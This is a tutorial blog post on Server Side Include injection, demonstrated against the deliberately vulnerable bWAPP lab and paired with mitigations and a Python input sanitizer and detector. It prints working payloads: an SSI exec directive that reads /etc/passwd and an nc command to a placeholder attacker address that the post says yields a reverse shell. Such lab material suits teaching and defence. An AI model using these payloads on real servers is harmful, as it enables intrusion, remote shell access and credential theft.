SSI — Server Side Include Injection
Let us say we have a web application containing multiple pages, each of which needs a change in some specific content (for example the name of the logged-in user). Editing the HTML by hand every single time would be tedious. This is where Server Side Includes come in: the server dynamically injects the required input into all the required places in the HTML code before the page is served.
Content:
- Introduction
- SSI Injection Vulnerability & Detection
- SSI Injection Attack Scenario
- Mitigations of SSI Injection Vulnerability
- Conclusion
Introduction
SSIs (Server Side Includes) are directives placed in the HTML pages of a web application so that the server can fill the page with dynamic content, which may be based on input provided by users.
It is a feature that allows developers to dynamically generate web content (HTML) by using ‘#’ directives.
The server executes the directive before the current page is delivered, which makes SSI different from CGI (Common Gateway Interface) scripts.
SSI Injection Vulnerability and Detection:
An SSI injection vulnerability allows an attacker to exploit the web application by injecting scripts or SSI directives into HTML pages, up to and including remote execution of arbitrary commands.
An SSI injection attack is performed by manipulating the SSI directives used by the application in a malicious way, either by intercepting the request or by supplying crafted user input.
To detect the vulnerability, we can verify whether the web application validates or sanitizes the HTML inputs that end up inside SSI directives, as shown below:
Another way is to look for pages with the extensions “.stm”, “.shtm” and “.shtml”. The absence of such pages does not mean the application cannot support SSI.
In any case, the attack will be successful only if the web server permits SSI execution without proper validation. This can lead to access to, and manipulation of, the file system and processes under the permissions of the web server process owner.
Thus it may let an attacker read sensitive files such as password files, or execute code remotely with the privileges of the server.
SSI Injection Attack Scenario:
bWAPP, a deliberately vulnerable application, provides us with a platform for an SSI injection demonstration.
We provide an input to the application, which redirects us to:
This shows that the first name and last name are generated dynamically, so there is a possibility of SSI injection.
Let us try SSI injection payloads in the inputs to verify whether the vulnerability exists or not.
<!--#exec cmd="cat /etc/passwd" -->
On submitting the payload, we can see that the command was executed successfully:
Escalating SSI to RCE:
Payload: <!--#exec cmd="nc {IPADD} {PORTNUMBER}" -->
Start the netcat listener before firing up the payload. Here, in my case, I have used port no. 2000 for the exploit.
Once we submit the payload, we get the reverse shell connected to the system.
Payloads:
Mitigations
- Sanitize the HTML inputs
- Encode the user input before rendering the pages
- Configure the server properly for dynamic content parsing
- Avoid having pages with the extensions mentioned before
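The first two mitigations in practice, as an added example that is not part of the original post: a sanitizer that HTML-encodes user input before it is rendered into an SSI-parsed page, plus a detector that flags request parameters containing SSI directive syntax so the attempts can be logged. The page path and the sample request lines are constructed for illustration. For the third mitigation, on Apache `Options IncludesNOEXEC` keeps SSI but disables `#exec`.

```python
import html
import re
import urllib.parse

# An SSI directive looks like "<!--#name ... -->"; capture the directive name.
SSI_DIRECTIVE = re.compile(r"<!--\s*#\s*(?P<name>[a-z]+)\b[^>]*-->", re.IGNORECASE | re.DOTALL)


def find_ssi_directives(value: str) -> list[str]:
    """Return the lower-cased directive names found in a user-supplied value."""
    return [m.group("name").lower() for m in SSI_DIRECTIVE.finditer(value)]


def render_greeting_vulnerable(first: str, last: str) -> str:
    """Raw input dropped into a page the server parses for SSI (the bug)."""
    return f"<p>Hello {first} {last}</p>"


def render_greeting_safe(first: str, last: str) -> str:
    """Encode '<', '>', '&' and quotes so the input can never form a directive."""
    return f"<p>Hello {html.escape(first, quote=True)} {html.escape(last, quote=True)}</p>"


def flag_requests(log_lines: list[str]) -> list[tuple[str, list[str]]]:
    """Detection: report (parameter, directives) for requests carrying SSI syntax."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        query = urllib.parse.urlsplit(parts[1]).query
        # parse_qsl URL-decodes the values, so encoded "<!--#exec" is seen as such
        for key, val in urllib.parse.parse_qsl(query, keep_blank_values=True):
            names = find_ssi_directives(val)
            if names:
                hits.append((key, names))
    return hits


# Constructed sample request lines (hypothetical path); the second carries an encoded directive.
SAMPLE_REQUESTS = [
    "GET /greet.shtml?firstname=Alice&lastname=Smith HTTP/1.1",
    "GET /greet.shtml?firstname=%3C%21--%23exec+cmd%3D%22id%22+--%3E&lastname=x HTTP/1.1",
]

if __name__ == "__main__":
    print(flag_requests(SAMPLE_REQUESTS))
    print(render_greeting_safe('<!--#exec cmd="id" -->', "Smith"))
```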
Conclusion:
SSI injection is quite a rare vulnerability, for both developers and attackers, but if exploited properly it can give an attacker system-level privileges and access to the target.
Developers may also be unaware of the need to sanitize input used inside SSI directives, which makes the vulnerability more dangerous.